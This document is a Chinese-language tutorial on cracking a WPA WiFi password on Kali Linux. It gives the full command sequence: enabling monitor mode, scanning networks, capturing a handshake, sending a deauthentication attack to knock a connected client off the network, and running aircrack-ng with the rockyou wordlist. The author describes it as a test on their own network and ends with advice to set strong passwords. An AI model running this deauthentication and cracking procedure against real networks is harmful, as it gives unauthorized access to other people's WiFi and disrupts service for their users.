環境準備: 一臺kali Linux的虛擬機,一臺win10的物理機
1) 打開 網卡的Monitor(監控)模式
> lsusb
在命令行運行 lsusb 查看當前系統的USB設備,因爲我這裏使用的是無線網卡,很明顯第一個設備就是插入的網卡,網卡爲Ralink類型,芯片爲MT7601U,已經自動安裝好驅動程序。
airmon-ng
運行 airmon-ng 命令,查看可支持開啓Monitor模式的網卡,很明顯這就是我們插入的Ralink網卡。
airmon-ng start wlan0
開啓監控模式,這裏的wlano就是使用airmon-ng 查看得到的Interface名字
開啓監控模式後wlan0這個設備就會變爲wlan0mon,網卡的工作模式也變爲Monitor 可以使用iwconfig查看下。
2) 當前當前環境下的WIFI網絡
airodump-ng wlan0mon
我們此次試驗破解的WIFI名稱爲TP-LINK_C4E7
- BSSID是AP端的MAC地址
- PWR是信號強度,數字越小越好
- Data是對應的路由器的在線數據吞吐量,數字越大,數據上傳量越大。
- CH是對應路由器的所在頻道
- ESSID是對應路由器的名稱
3)抓取握手包
當有新用戶連接WIFI,或者斷開WIFI中心連接的過程中會發送握手包,這是開啓監控模式的網卡就可以抓取到這個握手包。
airodump-ng -c 11 –bssid F4:83:CD:C9:C4:E7 -w ~/ wlan0mon
- -c 指定頻道號,這裏是11
- -bssid 指定路由器的bssid這裏是 F4:83:CD:C9:C4:E7
- -w 指定數據包的地址 ~/表示存放在/root路徑下
這裏的STATION就是當前連接到這個網絡的電腦的MAC地址(就是我啦),在電腦的CMD命令行中出入 ipconfig/all 命令就可以查看本機MAC地址。
4) 強制連接到WIFI的用戶重新連接WIFI。
這時我們可以等新用戶使用密碼連接(誰知道會不會有新用戶連接(ㄒoㄒ)),時間是很寶貴的,所以我們要做的就是強制某個已連接的電腦斷開WIFI並且重新連接(PS. 基本上無法察覺,只是會斷網幾秒鐘),
aireplay-ng -deauth 2 -a F4:83:CD:C9:C4:E7 -c 38-B1-DB-FD-9B-23 wlan0mon
- -deauth 表示進行解除認證攻擊(告訴已連接的電腦路由器不認識你了,需要你重新登錄) 後面的2表示攻擊的次數,如果爲0表示無線攻擊,被攻擊的電腦就無法連接WIFI了(PS.儘量不要這麼做)。
- -a 後面指定路由器的bssid,前面已經提到過
- -c 後面指定被攻擊的電腦的MAC地址
攻擊成功後抓包的界面就會顯示
至此抓包過程就結束了,關閉網卡的Monitor模式
airmon-ng stop wlan0mon
5)破解密碼
破解密碼需要字典就和英語字典一樣,kali本身就帶有rockyou字典。這裏我已經解壓好了,第一次使用需要解壓。
開始破解
aircrack-ng -a2 -b F4:83:CD:C9:C4:E7 -w /usr/share/wordlists/rockyou.txt ~/*.cap
- -b 後面指定路由器的bssid
- -w 指定字典位置 在後面跟抓到的包
破解完畢,因爲密碼超級簡單所以破解過程花了大概5s? (PS.這就是設密碼的時候要設置複雜的原因ヽ( ̄▽ ̄)ノ)